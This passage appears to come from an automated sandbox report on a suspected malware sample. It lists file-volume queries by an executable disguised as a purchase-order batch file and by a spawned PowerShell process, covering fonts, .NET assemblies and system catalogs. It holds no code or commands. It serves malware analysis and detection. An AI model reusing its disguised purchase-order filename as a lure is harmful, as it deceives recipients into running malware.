                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
